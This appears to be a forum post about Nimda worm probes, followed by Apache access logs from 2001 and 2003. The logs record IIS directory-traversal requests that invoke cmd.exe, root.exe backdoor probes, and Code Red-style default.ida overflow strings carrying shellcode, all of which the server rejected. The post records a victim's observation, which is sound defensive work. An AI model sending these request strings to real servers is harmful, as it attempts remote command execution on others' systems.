The Nimda worm (also known as W32.Nimda.A@mm, Code Rainbow, Minda and Nimbda) is a self-replicating piece of software that infects IIS web servers as well as clients running Internet Explorer 5.
Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these:

```text
209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 265
```
Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the logs of the past 3 months; there are about 200 tries of this kind from various ranges of IP addresses.

I think this is apparently a virus attack. Has anybody here ever found such logs? I just dialed up to the Internet, the connection lasted for about 30 minutes, and I got this attack. I would keep my httpd closed. Thank God my system is Linux, not NT.
Apache access log

```text
24.162.164.121 - - [04/Apr/2003:16:50:47 -0600] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 333
24.162.164.121 - - [04/Apr/2003:16:50:53 -0600] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 349
24.162.164.121 - - [04/Apr/2003:16:50:57 -0600] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:00 -0600] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:03 -0600] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:07 -0600] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:11 -0600] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:16:51:14 -0600] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:16:51:16 -0600] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:16:51:19 -0600] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.119.123 - - [04/Apr/2003:17:51:02 -0600] 'GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0' 404 289
24.162.29.46 - - [04/Apr/2003:18:01:10 -0600] 'GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0' 404 289
24.162.164.121 - - [04/Apr/2003:18:29:25 -0600] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 294
24.162.164.121 - - [04/Apr/2003:18:29:28 -0600] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 292
24.162.164.121 - - [04/Apr/2003:18:29:30 -0600] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 302
24.162.164.121 - - [04/Apr/2003:18:29:33 -0600] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 302
24.162.164.121 - - [04/Apr/2003:18:29:36 -0600] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:18:29:38 -0600] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 333
24.162.164.121 - - [04/Apr/2003:18:29:41 -0600] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 333
24.162.164.121 - - [04/Apr/2003:18:29:45 -0600] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 349
24.162.164.121 - - [04/Apr/2003:18:29:51 -0600] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:54 -0600] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:57 -0600] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:59 -0600] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:30:01 -0600] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:18:30:03 -0600] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
```